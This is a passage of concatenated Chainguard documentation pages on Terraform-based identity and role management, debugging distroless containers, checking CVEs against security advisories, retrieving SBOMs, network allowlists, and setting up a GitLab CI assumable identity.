Throughout your Terraform code, you can refer to this value as local.org_id. If you are setting up a reusable Terraform module, you may consider using an input variable instead. Please refer to the Terraform documentation for more information.

Using data sources

Data sources allow Terraform to access and use information that was defined outside of your Terraform configuration. The available data sources for Chainguard resources are groups, identities, and roles.
If you know the exact name of your organization, you can use a data resource to query the API for it: data "chainguard_group" "org" { # This indicates the group is an organization. parent_id = "/" name = "[organization name]" } To refer to the organization’s ID in other parts of your Terraform configuration, you would use the reference data.chainguard_group.org.id. The rest of the examples in this document will use this for referring to the organization’s ID. Managing users The Chainguard Terraform provider is useful for configuring your organization’s users and roles. When authenticating with the Chainguard platform, you have the option of using the default OIDC providers (GitHub, GitLab, Google). You can also bring your own identity provider, as long as it is OIDC compliant. To configure a new identity provider for your organization, use the chainguard_identity_provider resource. You must provide a parent_id (your organization’s ID), a name (the identity provider service is a good choice), a default_role that new users will be bound to upon their first login, and an oidc configuration: # The default role can be either a built-in role, or a custom role. # To see the list of available built-in roles # use chainctl iam roles list --managed data "chainguard_role" "default_role" { name = "registry.pull_token_creator" } resource "chainguard_identity_provider" "idp" { parent_id = data.chainguard_group.org.id name = "[identity provider service]" description = "My org's identity provider" # Role data sources return list of matched roles. # Don't use data.chainguard_role.default_role.id here, as that # is not the ID of the returned role. default_role = data.chainguard_role.default_role.items.0.id oidc { issuer = "[URL of identity provider issuer]" client_id = "[identity provider client ID]" client_secret = "[identity provider client secret]" # openid scope is always requested, add additional scopes # your identity provider provides (e.g. email, profile) additional_scopes = ["email"] } } As this example shows, you also have the option of including a description of the identity provider. If you’re not bringing your own identity provider, but rather relying on one of the default OIDC providers, you can still pre-bind users to roles within your organization so they can log in and access your organization’s resources right away. As an example, say you want your users to log in with their GitHub account. To pre-bind users to a role within your organization, you will need to know their GitHub IDs and add them to a Terraform configuration like the following: # Create a custom role in this example for first time users. resource "chainguard_role" "default_role" { parent_id = data.chainguard_group.org.id name = "org-default-role" description = "The role new users are bound to on first login." # A full list of all capabilities you can assign to a role # are available with chainctl iam roles capabilities list capabilities = [ "groups.list", "repo.list", "tag.list", ... ] } # Gather a list of user identities data "chainguard_identity" "users" { # Assumes there exists a github_ids set variable defined # with the GitHub IDs of your users for_each = var.github_ids # The issuer is always the same when using the default # OIDC providers. 
issuer = "https://auth.chainguard.dev/" # Subjects are prepended with the name of the OIDC provider # when using the default provider: github, gitlab, or google-oauth2 subject = "github|${each.key}” } # Bind your users to a default role resource "chainguard_rolebinding" "default_bindings" { for_each = var.github_ids group = data.chainguard_group.org.id identity = data.chainguard_identity.users[each.key].id role = chainguard_role.default_role.id } After applying this Terraform configuration, any user whose GitHub ID was included can log in and will already be bound to the default role. Learn more The Chainguard Terraform provider documentation includes examples of how you can use it to manage your Chainguard resources. For more information on setting up custom identity providers, we encourage you to check out our documentation on setting up custom IDPs, as well as our examples for Okta, Ping Identity, and Microsoft Entra ID. Additionally, our tutorial on using the Terraform provider to grant members of a GitHub team access to the resources managed by a Chainguard organization provides more context and information to the method outlined in this guide. --- ### Debugging Distroless Containers with Docker Debug URL: https://edu.chainguard.dev/chainguard/chainguard-images/troubleshooting/debugging_distroless/ Last Modified: December 12, 2024 Tags: Product, Chainguard Containers, Video Tools used in this video Docker Desktop (Note a paid subscription is required.) Transcript Hey folks, I wanted to record a short video explaining how you can debug container images, even distroless ones. One of the problems with distroless images is that they can be difficult to debug. Now if you’re using Kubernetes, please try out ephemeral containers, but in this video I want to talk about something else. In Docker desktop 4.27 they have a beta feature called debug, and I’m going to demonstrate that now. So I’m going to start a Chainguard nginx image. Note that Chainguard nginx images run on port 8080 for security reasons. Now that should be running in the background, so if I switch to my browser and we hit reload, yep nginx is there and running. So say I want to debug this nginx container, say it’s not displaying the right content or it can’t reach another container, something like that. So typically what you might want to do is use docker exec to get a shell into the container. But if I try to run bash, I get told there is no bash, and I get told there is no sh. And even if I get the full path, it doesn’t work. Because this is a distroless container, there’s no shell available to me. There are also very few utils. So I can’t even run ping for example. So the only way to debug this container at the minute is from the outside, if you like. Or is it? Because with Docker 4.27, I now have this debug command. So if I run docker debug debug test, this is what happens. And suddenly I have a shell into the container. Basically what’s happened is it’s side loaded a Nix environment into the container. And from here I can install tools to debug things. It also has a linting tool to check the entry point. So you can see the entry point here is fine. It does have editors, et cetera. I believe ping is here. Yep. So what can we do? We can also look at the container file system and edit it live. So for example, if I do /etc/nginx, and autocomplete works, and here’s the default conf, and there’s the location of the nginx files. So let’s take a look at these nginx files. And here’s index.html. And this is welcome to nginx. 
So let’s try live editing this. Okay. I saved that. Now let’s go back to our browser and reload it. Yeah. So there we are. I’ve live edited a distroless container that had no shell and no editor inside it. So there is more you can do. You can install further tooling, but like I said, it does have some basic tooling with it. But like say, I don’t know if you want to install a different editor, you can definitely do that. So here we go. There’s install emacs. Note this is a beta version. So I have noticed this error coming up a few times or warning. I do believe it’s actually innocuous and hopefully that will be changed in newer versions, but it has actually installed emacs there. Now I don’t use emacs. So I always have to struggle to escape. Is it control? Oh, no. There we go. Okay. So there you go. That’s how you can debug a distroless container using the new Docker debug feature. Please do give it a go and let me know how you get on. Relevant Resources Debugging Distroless Container Images with Kubectl Debug and CDebug (Video) Debugging Distroless Container Images (Article) --- ### How to Use Chainguard Security Advisories URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/security-advisories/how-to-use/ Last Modified: April 11, 2025 Tags: Chainguard Containers, CVE, Product When using scanners such as Grype or Docker Scout to scan for vulnerabilities in Chainguard Containers, you’ll often find that there are few or no CVEs present. However, CVEs can sometimes be found in Chainguard Containers, and you may also encounter CVEs if you’re using older tags. In these cases, you will likely wish to check Chainguard’s security advisories for information on which CVEs will cause security issues in your deployment. To help demystify the nature of CVEs within Chainguard Containers, we’ve created a self-service Security Advisories page that lists every security advisory published for Chainguard Containers. Having this information available allows you to view whether Chainguard is aware of a specific vulnerability reported to exist within a Chainguard Container and whether we’ve mitigated or are planning to mitigate the CVE. In alignment with the Chainguard Container Product Release Lifecycle, our vulnerability management strategy focuses on the latest versions of any given release track, as these are the versions we actively maintain and secure. Accordingly, we only publish new CVE advisories for packages that fall within our defined support scope. We do not actively monitor non-supported versions of a package or image. Our efforts are centered on keeping the latest versions up-to-date and as close to zero CVEs as we can, while encouraging customers to upgrade and stay on supported versions. This guide outlines how you can use Chainguard’s Security Advisories to learn more about the status of a CVE within a given package. It will walk through a practical example of discovering a vulnerability in a Chainguard Container, searching for Security Advisories associated with this vulnerability, and then comparing the original container image with a later version. Prerequisites You don’t need any special access or software to explore Chainguard’s Security Advisories. However, this guide includes a few examples that use specific software tools in order to outline a practical example of how one might navigate and use these Security Advisories. To follow along with these examples, you’ll need the following tools installed. 
A security scanner like Trivy, Grype, or Docker Scout — This guide's examples use Grype to scan container images and identify vulnerabilities. However, you should be able to follow along with any container vulnerability scanning tool.

chainctl — Chainguard's command-line interface tool. To install chainctl, follow our installation guide.

jq — jq is a command-line JSON processor that allows you to filter and manipulate streaming JSON data. Although it isn't strictly necessary for the purposes of this guide, this tutorial includes commands that use jq to filter command output that would otherwise be difficult to read. You can install jq by following the instructions on the project's Download jq page.

Lastly, note that this guide includes examples involving a sample organization with a private registry provided by Chainguard and named example.com. If you would like to follow along with your own private Chainguard Containers, be sure to change this where relevant to reflect your own setup. If you don't have access to a private registry, you can also follow along using Chainguard's public Starter Containers, but be aware that these are limited to only the latest or latest-dev tags. You can download public Starter Containers from the cgr.dev/chainguard registry, as in cgr.dev/chainguard/go:latest.

So you've encountered a CVE in a Chainguard Container

Say you use a vulnerability scanner like Grype or Docker Scout to inspect a certain Chainguard Container. This example uses Grype to scan a Production container image, specifically one tagged with 1.21.2. As of this writing, the go:1.21.2 image points to the image digest sha256:04ab6905552b54a6977bed40a4105e9c95f78033e1cde67806259efc4beb959d. Be aware that this tag will be withdrawn in the future, but the digest will remain available.

grype cgr.dev/example.com/go:1.21.2

Because this is the digest for an older version of Chainguard's Go container image, this command's output will show a number of vulnerabilities that have been found to exist within this specific version of the container image.

. . .
├── by severity: 28 critical, 230 high, 185 medium, 4 low, 0 ...

This output shows that this particular image has many critical and high vulnerabilities. The Grype output also lists each of the packages affected by CVEs as well as the specific vulnerabilities it found for each. Note: All of these vulnerabilities have been addressed in newer versions of the Go Chainguard Container. Within this output, we find that the package nghttp2 is referenced.

grype cgr.dev/example.com/go:1.21.2 | grep nghttp2
...
libnghttp2-14   1.56.0-r0   1.57.0-r0   apk   CVE-2023-44487        High
libnghttp2-14   1.56.0-r0   1.61.0-r0   apk   CVE-2024-28182        Medium
libnghttp2-14   1.56.0-r0   1.57.0-r0   apk   GHSA-qppj-fm5r-hxr3   Unknown

We'll use the HIGH severity vulnerability listed here as an example when we explore Chainguard's Security Advisories in the next section. Copy or note down the CVE identifier (2023-44487 in this case). Additionally, note down the name of the affected package (nghttp2). You'll use these details to retrieve more information about the CVE shortly.

Searching the Security Advisories

After finding a vulnerability in a Chainguard Container, you can navigate to Chainguard's Security Advisories page. This is a helpful resource you can use to determine the status for any CVE found within a Chainguard Container.
The Security Advisories page is self-service, allowing you to check whether Chainguard is aware of a specific vulnerability and whether it has been mitigated in a certain package version. You can search the Security Advisories page by entering any CVE identifier to find what packages are affected by that CVE. You can also enter the names of individual packages to find what CVEs have been reported within them. Enter the CVE identifier you copied previously (2023-44487) into the search box at the top of the page. This will immediately filter the list of security advisories to only show packages where that CVE has been reported. It will also show the Status of each. If you click on any row in the filtered list, it will take you to the CVE's specific page. There, you'll find a list of every package where this CVE has been reported. As with the Security Advisories landing page, you can filter by package name here on the CVE's landing page as well. Enter the name of the package we highlighted previously (nghttp2) and the list will immediately filter out any packages that do not mention that string in their metadata. For CVE-2023-44487, the nghttp2 package's Status is marked as Fixed in version 1.57.0-r0 as of October 11, 2023.

Comparing Containers

Chainguard's Security Advisories have told us that CVE-2023-44487 was fixed and removed from nghttp2 in a more recent version than the one available in Chainguard's go:1.21.2 image. However, we don't have to take that report at face value; we can inspect a later version of the same container image and compare it with version 1.21.2 to determine whether the vulnerability is still present in the later version. If you inspect a later version of the image with Grype, you'll find that this time it does not report the high CVE we noted earlier. This example inspects version 1.21.5 of the image.

grype cgr.dev/example.com/go:1.21.5 | grep nghttp2

You should find that the high CVE fixed in this specific version no longer appears in the output. (You may still see other CVEs fixed in later versions.) You can go a step further by comparing these two container images directly with the chainctl images diff command, as in this example.

chainctl images diff \
  cgr.dev/example.com/go:1.21.2 \
  cgr.dev/example.com/go:1.21.5 | jq .

This example will return a lot of output, as there are significant differences from version 1.21.2 to 1.21.5 of the Go container image. If you scroll down to the vulnerabilities section of this output, you'll find a list of vulnerabilities that are present in version 1.21.2 but have been removed by version 1.21.5.

"vulnerabilities": {
    . . .
    {
      "id": "CVE-2023-44487",
      "reference": "chainguard:distro:chainguard:rolling",
      "severity": "High"
    },
    . . .

As this output indicates, CVE-2023-44487 is no longer present in later versions of the Go Chainguard Container. If you were using version 1.21.2, you should seriously consider upgrading to a later version.

Learn More

The Security Advisories page serves as a helpful resource for anyone who wants to learn more about CVEs reported within Chainguard Containers. You can search the database of advisories to learn more about any CVEs you encounter as you work with Chainguard Containers. Additionally, we encourage you to explore the Chainguard Containers Directory, the parent site of the Security Advisories page. The Directory allows users to explore the complete inventory of Chainguard Containers.
Finally, we encourage you to learn more about noisy scan results when scanning Chainguard Containers. --- ### How to Retrieve SBOMs for Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/retrieve-image-sboms/ Last Modified: April 8, 2025 Tags: Chainguard Containers, SBOM Chainguard Containers contain only the minimum number of packages needed to use the software they contain. The purpose of this is to reduce the image’s attack surface and minimize the risk that CVEs will impact software that depends on these container images. Even though they contain the minimum number of packages, there may come a time when you want to know exactly what’s running inside of a certain Chainguard Container. For this reason, we include a signed SBOM with each image in the form of a software attestation. Cosign — a part of the Sigstore project — supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry, as well as the retrieval of said artifacts. This tutorial outlines how you can use the cosign command to retrieve a Chainguard Container’s SBOM. Prerequisites In order to follow this guide, you’ll need the following installed on your local machine: Cosign — to retrieve SBOMs associated with Chainguard Containers, check out our guide on installing Cosign to configure it. jq — to process JSON, visit the jq downloads page to set it up. Using Cosign to retrieve an container image’s SBOM Cosign includes a download command that allows you to retrieve a Chainguard Container’s attestation over the command line. To do so, you would use this command with syntax like the following. cosign download attestation cgr.dev/chainguard/php | jq -r .payload | base64 -d | jq .predicate This example command downloads the attestation of our php image. Notice that this example syntax includes download attestation rather than download sbom. You can generally think of an attestation as an authenticated statement about a software artifact. There are different types of attestations as defined by the SLSA 1.0 specification, and they are typically referenced by their predicate type. One of the available predicate types is SPDX, an open standard for SBOM files. Because attestations must be signed, this is a way to verify the authenticity of the software producer, thereby ensuring the accuracy of the SBOM and the quality of the software. This attestation data is encoded in base64, making it unreadable without further processing. This is why the output from the first part of the command is piped into jq in order to filter out the payload section of the output containing the SBOM. This filtered output is then passed into the base64 command to be decoded before that output is piped into another jq command. The final jq command extracts the attestation predicate from the base64 output and returns it to your terminal. As an example, to retrieve the apko image’s attestation you would run a command like this. cosign download attestation \ --platform=linux/amd64 \ --predicate-type=https://spdx.dev/Document \ cgr.dev/chainguard/apko | jq -r .payload | base64 -d | jq .predicate This example includes two extra arguments not included in the example syntax outlined previously. First, it includes the --platform flag which allows you to download the attestation for a specific platform image. This example specifies the linux/amd64 platform, but you could also use linux/arm64. 
Be aware, though, that in order to use the --platform option you’ll need to have Cosign version 2.2.1 or newer installed. The other extra argument is the --predicate-type flag, required to specify which type of predicate you want to download from the registry. In order to download Chainguard Containers SBOM attestations, you should use the https://spdx.dev/Document predicate type. Image SBOMs in the Chainguard Console You can also find container image SBOMs in the Chainguard Console. After signing in to the Console and clicking either the Public images or, if available, Organization images you’ll be presented with a list of images. Clicking on any of these will take you to the image’s landing page. There, you can click on the SBOM tab to find and download the SBOM for the given image. The following example shows the SBOM tab for the postgres image. You can use the drop-down menu above the table to select which version and architecture of the image you want to view. You can also use the search box to find specific packages in the SBOM or use the button to the right of the search box to download the SBOM to your machine. Check out our guide on using the Chainguard Containers Directory for more details. License Information and Source Code references The SBOM downloaded using either Cosign or Console methods described previously contain identical information. It lists binary packages present in the image, their licensing information using SPDX license and exceptions lists, and external source code references. These source code references are encoded in the external references field, using external repository identifiers in the package URL (purl) format. The purl specification allows for various different schemes and types. The following purls are used in Chainguard SPDX SBOM: pkg:apk denotes binary package origin, name, full version number with epoch, and architecture: pkg:apk/wolfi/ca-certificates-bundle@20240315-r4?arch=x86_64 pkg:github is used for upstream source code reference for packages built from GitHub repositories. These purls always include a fixed commit hash and, when available, also include a tag-version: pkg:github/openssl/openssl.git@openssl-3.3.1 pkg:github/openssl/openssl.git@db2ac4f6ebd8f3d7b2a60882992fbea1269114e2 Note that pkg:github is also used to reference melange packaging files from Wolfi and Chainguard. These are provided with a subpath component and a fixed commit hash: pkg:github/wolfi-dev/os@f18ff825f94b9177cf603c6e3d72936683a504d2#glibc.yaml pkg:generic is used to reference any other upstream download locations, most commonly tarballs: pkg:generic/gcc@13.2.0? checksum=sha256%3A8cb4be3796651976f94b9356fa08d833524f62420d6292c5033a9a26af315078& download_url=https%3A%2F%2Fftp.gnu.org%2Fgnu%2Fgcc%2Fgcc-13.2.0%2Fgcc-13.2.0.tar.gz Also note that pkg:generic is used to reference upstream git repositories, outside of GitHub: pkg:generic/ca-certificates@20240315? vcs_url=git%2Bhttps%3A%2F%2Fgitlab.alpinelinux.org%2Falpine%2Fca-certificates%4009e5e43336e532ec8217ae3bfc912bcb7048f65a purls are human-readable, but various programming and scripting languages have implementations that can parse them. Because SPDX SBOMs are distributed within the Chainguard Containers repository alongside each image hash, you can achieve source code access compliance by ensuring all attestations are mirrored together with each image. 
As an example, a snippet of a binary package SPDX stanza with license, version, and source code references is shown here: { "SPDXID": "SPDXRef-Package-glibc-locale-posix-2.39-r6", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:apk/wolfi/glibc-locale-posix@2.39-r6?arch=x86_64", "referenceType": "purl" }, { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:generic/glibc@2.39?checksum=sha256%3Af77bd47cf8170c57365ae7bf86696c118adb3b120d3259c64c502d3dc1e2d926&download_url=http%3A%2F%2Fftp.gnu.org%2Fgnu%2Flibc%2Fglibc-2.39.tar.xz", "referenceType": "purl" }, { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:github/wolfi-dev/os@f18ff825f94b9177cf603c6e3d72936683a504d2#glibc.yaml", "referenceType": "purl" } ], "licenseDeclared": "LGPL-2.1-or-later", "name": "glibc-locale-posix", "originator": "Organization: Wolfi", "supplier": "Organization: Wolfi", "versionInfo": "2.39-r6" } This snippet shows that the glibc-locale-posix binary package is distributed under the LGPL-2.1-or-later license, built from the glibc-2.39.tar.xz upstream tarball, using the glibc.yaml file from the wolfi-dev/os repository. Learn more We provide provenance information for every Chainguard Container on its respective details page. After reaching the Overview for the image of your choice, navigate to the Provenance tab for information on how to retrieve the image’s attestations, as well as how to verify its attestations and signatures. For example, if you’re looking for the provenance information of the Python image, you can navigate to the Python provenance information page. --- ### Chainguard Containers Network Requirements URL: https://edu.chainguard.dev/chainguard/chainguard-images/network-requirements/ Last Modified: June 17, 2025 Tags: Product, Reference This document provides an overview of network requirements for using Chainguard Containers. To use Chainguard tools and Containers in environments with firewalls, VPNs, and IDS/IPS systems, you will need to add some rules to allow traffic into and out of your networks. Chainguard Containers do not call Chainguard services while running, so no network changes are required for the runtime environment. Review the Notes column for more information on each hostname. Chainguard Containers Hosts This table lists the DNS hostnames, associated ports, and protocols that will need to be allowed through firewalls and proxies to use Chainguard Containers:

| Hostname | Port | Protocol | Notes |
| --- | --- | --- | --- |
| cgr.dev | 443 | HTTPS | Main container image registry |
| console.chainguard.dev | 443 | HTTPS | Chainguard dashboard |
| data.chainguard.dev | 443 | HTTPS | Console API endpoint |
| console-api.enforce.dev | 443 | HTTPS | Registry API endpoint |
| enforce.dev | 443 | HTTPS | Registry authentication |
| dl.enforce.dev | 443 | HTTPS | chainctl downloads |
| issuer.enforce.dev | 443 | HTTPS | Registry STS (Security Token Service) |
| apk.cgr.dev | 443 | HTTPS | Package repository |
| virtualapk.cgr.dev | 443 | HTTPS | Package repository |
| packages.cgr.dev | 443 | HTTPS | Package repository (Extra packages) |
| packages.wolfi.dev | 443 | HTTPS | Package repository (Starter containers) |

If you experience networking issues while trying to use Chainguard Containers, please ensure that your firewall allows traffic to and from these hosts, and that it doesn’t have any rules to block .dev domains. 
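After updating your firewall or proxy rules, a quick way to confirm that these hosts are reachable from inside your network is to request them directly. The commands below are a minimal sketch assuming curl is available; for the registry endpoint, even an HTTP 401 response confirms that the connection itself is allowed.
curl -sI https://cgr.dev/v2/ | head -n 1
curl -sI https://dl.enforce.dev | head -n 1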
Chainguard Containers Third-party Hosts This table lists the third-party DNS hostnames, associated ports, and protocols that will need to be allowed through firewalls and proxies to use Chainguard Containers:

| Hostname | Port | Protocol | Notes |
| --- | --- | --- | --- |
| 9236a389bd48b984df91adc1bc924620.r2.cloudflarestorage.com | 443 | HTTPS | Blob storage for cgr.dev |
| support.chainguard.dev | 443 | HTTPS | Support access for customers |

Ingress and Egress Connections to the hosts listed on this page are generally initiated as new outbound connections. If you are using stateful firewall rules, then you will need to add symmetric rules to ensure that traffic flows correctly. You will need egress rules that allow new traffic to the hosts listed here. You will need corresponding ingress rules that allow related and established traffic. DNS Records and TTLs Many of the hosts listed on this page use multiple DNS A records or CNAME aliases. Additionally, many A records have a short time to live of 60 seconds, and the majority are less than an hour (3600s). If your network filters traffic based on IP addresses, ensure that any firewalls update their rules at an appropriate interval to match the TTL for each DNS record. --- ### Create an Assumable Identity for a GitLab CI/CD Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/gitlab-identity/ Last Modified: June 14, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines two methods for how to create a Chainguard identity: chainctl and Terraform. It then walks through how to create a GitLab CI/CD pipeline that will assume the identity to interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. Both methods outlined in this guide require you to have the following: Access to a GitLab project and CI/CD pipeline you can use to test out the identity you’ll create. GitLab provides a quickstart tutorial on creating your first pipeline, which can be useful for getting a testing pipeline up and running. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. Additionally, the Terraform method requires you to have terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. Create an Assumable Identity with chainctl You can create a new Chainguard identity that a GitLab CI/CD pipeline can assume by running the following command. Be sure to replace <organization> with the name of the Chainguard organization you want this identity to be used for. You’ll also need to replace <group_name> and <project_name> with your actual GitLab group and project names. 
For example, if your GitLab project URL is https://gitlab.com/mycompany/myproject, then: <group_name> should be mycompany <project_name> should be myproject chainctl iam identities create cg-gitlab-id \ --parent=<organization> \ --identity-issuer="https://gitlab.com" \ --subject="project_path:<group_name>/<project_name>:ref_type:branch:ref:main" \ --audience="https://gitlab.com" \ --role=viewer Take note of the identity’s full UIDP (unique identity path) as you’ll need it to test this identity out in a GitLab CI/CD configuration. This command creates an identity named cg-gitlab-id with the following claim matching rules: Issuer: https://gitlab.com (GitLab’s OIDC token issuer) Subject: Restricts access to a specific GitLab project running on the main branch Audience: https://gitlab.com (the intended recipient of the token) These options’ values are string literals; you can use --identity-issuer-pattern, --subject-pattern, and --audience-pattern to use regular expressions instead. This command also binds the viewer role to the new identity. The viewer role provides read-only access to Chainguard resources, which is appropriate for most CI/CD use cases that need to pull images or inspect resources. You can also chain together multiple roles, as in --role=registry.push,registry.pull. To see all available roles and their permissions, run chainctl iam roles list. You can also learn more by reviewing our Overview of Roles and Role-bindings in Chainguard. If you ever need to retrieve information about this identity in the future, you can run the following command: chainctl iam identities ls This will return cg-gitlab-id listed among all your Chainguard identities. With that, you can jump ahead to testing the new identity. You can also continue on to the next section and learn how to create another such identity with Terraform. Create an Assumable Identity with Terraform This section outlines how to use Terraform to create an identity for a GitLab pipeline to assume. This involves creating two Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/gitlab-tf && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file; we will define the rest of the resources in the other file. In main.tf, we declare and initialize the Chainguard Terraform provider. gitlab.tf The gitlab.tf file is what will actually create the identity for your GitLab CI pipeline workflow to assume. The file will consist of five sections, which we’ll go over one by one. The first section looks up a Chainguard IAM organization named myorg.biz: data "chainguard_group" "group" { name = "myorg.biz" } Be sure to change myorg.biz to the name of your own Chainguard organization. The next section creates the identity itself. resource "chainguard_identity" "gitlab" { parent_id = data.chainguard_group.group.id name = "gitlab-ci" description = <<EOF This is an identity that authorizes Gitlab CI in this repository to assume to interact with chainctl. 
EOF claim_match { issuer = "https://gitlab.com" subject = "project_path:<group_name>/<project_name>:ref_type:branch:ref:main" audience = "https://gitlab.com" } } First, this section creates a Chainguard Identity tied to the chainguard_group looked up at the start of the gitlab.tf file. The identity is named gitlab-ci and has a brief description. The most important part of this section is the claim_match. When the GitLab pipeline tries to assume this identity later on, it must present a token matching the issuer, subject, and audience specified here in order to do so. The issuer is the entity that creates the token, the subject is the entity that the token represents (here, the GitLab pipeline), and the audience is the intended recipient of the token. In this case, the issuer field points to https://gitlab.com, the issuer of JWT tokens for GitLab pipelines. Likewise, the audience field also points to https://gitlab.com. This will work for demonstration purposes, but if you’re taking advantage of GitLab’s support for custom audiences then be sure to change this to the appropriate audience. These values are string literals; the claim_match block also accepts pattern-based variants of these fields if you need to match with regular expressions instead. The GitLab documentation provides several examples of subject claims which you can refer to if you want to construct a subject claim specific to your needs. For the purposes of this guide, though, you will need to replace <group_name> and <project_name> with your GitLab group and project names, respectively. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "gitlab-identity" { value = chainguard_identity.gitlab.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.gitlab.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + gitlab-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After typing yes and pressing ENTER, the command will complete and will output a gitlab-identity value. ... Apply complete! Resources: 4 added, 0 changed, 0 destroyed. Outputs: gitlab-identity = "<your gitlab identity>" This is the identity’s UIDP (unique identity path), which you configured the gitlab.tf file to emit in the previous section. Note this value down, as you’ll need it to set up the GitLab CI pipeline you’ll use to test the identity. 
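Because the UIDP is exposed as a Terraform output named gitlab-identity, you can also print it again at any time from this working directory. This is a small convenience sketch and assumes the local Terraform state from the apply step is still present.
terraform output -raw gitlab-identity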
If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error partway through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. You’re now ready to create a GitLab CI pipeline which you’ll use to test out this identity. Testing the identity with a GitLab CI/CD Pipeline From the GitLab Dashboard, select Projects in the left-hand sidebar menu. From there, click on the project you specified in the subject claim to be taken to the project overview. In the list of the repository’s contents, there will be a file named .gitlab-ci.yml. This is a special file that’s required when using GitLab CI/CD, as it contains the CI/CD configuration. Click on the .gitlab-ci.yml file, then click the Edit button and select an option for editing the file. For the purposes of this guide, delete whatever content is currently in this file and replace it with the following. image: cgr.dev/chainguard/wolfi-base stages: - assume-and-explore assume-and-explore: id_tokens: ID_TOKEN_1: aud: https://gitlab.com stage: assume-and-explore script: - | # Install wget apk add wget # Install chainctl. wget -O chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_linux_$(uname -m)" chmod +x chainctl mv chainctl /usr/bin # Assume the identity. chainctl auth login \ --identity-token $ID_TOKEN_1 \ --identity <your gitlab identity> chainctl auth configure-docker \ --identity-token $ID_TOKEN_1 \ --identity <your gitlab identity> # Explore available images. chainctl images repos list Let’s go over what this configuration does. First, GitLab requires that pipelines have a shell. To this end, this configuration uses the cgr.dev/chainguard/wolfi-base image since it includes the sh shell. Next, this configuration creates a JSON Web Token (JWT) with an id_tokens block that will allow the job to fetch an OIDC token and authenticate with Chainguard. GitLab requires that any JWTs created in this manner include an aud keyword. In this case, it should align with the audience associated with the Chainguard identity you created: https://gitlab.com. Following that, the job runs a few commands to download and install chainctl. It then uses chainctl, the JWT, and the Chainguard identity’s id value to assume the Chainguard identity and log in. Note: Be sure to replace <your gitlab identity> with the identity UIDP you noted down in the previous section. After logging in, the pipeline is able to run any chainctl command under the assumed identity. To test out this ability, this configuration runs the chainctl images repos list command to list all available image repos associated with the organization. After updating the configuration, commit the changes and the pipeline will run automatically. A status box in the dashboard will let you know whether the pipeline runs successfully. Click Build and then Pipelines to view the pipeline, and then click the assume-and-explore job button to open the job’s output from the last run. There you should see a list of container repositories accessible to your organization: . . . Successfully exchanged token. Valid! 
Id: $ORGANIZATION/$IDENTITY Updated auth config for cgr.dev [cgr.dev/example.edu] ├ [buildkit] ├ [mongodb] ├ [nginx] ├ [node] ├ [postgresql] └ [python] This indicates that the GitLab CI/CD pipeline did indeed assume the identity and run the chainctl images repos list command. Next Steps If you’d like to experiment further with this identity and what the workflow can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions, you can change the role data source to the role you would like to grant. data "chainguard_roles" "editor" { name = "editor" } To retrieve a list of all the available roles — including any custom roles — you can run the following command. chainctl iam roles list You can also edit the pipeline itself to change its behavior. For example, instead of inspecting the image repos the identity has access to, you could have the workflow inspect the organization, as in the following example. chainctl iam orgs ls The GitLab pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To delete the identity created directly with chainctl, run the following: chainctl iam identities delete cg-gitlab-id This will also remove the identity’s role-binding. To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the identity and the role-binding created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/gitlab-tf/ Following that, all of the example resources created in this guide’s Terraform instructions will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using GitLab CI/CD pipelines, we encourage you to check out the official documentation on the subject. --- ### Create Role-bindings for a GitHub Team Using Terraform URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/roles-role-bindings/rolebinding-terraform-gh/ Last Modified: May 9, 2024 Tags: Product, Procedural There may be cases where an organization will want multiple users to have access to the same Chainguard organization. Chainguard allows you to grant other users access to Chainguard by generating an invite link or code. In addition, you can now grant access to users using Terraform and identity providers like GitHub, GitLab, and Google. You can also manage access through these providers’ existing group structures, like GitHub Teams or GitLab Groups. Granting access through 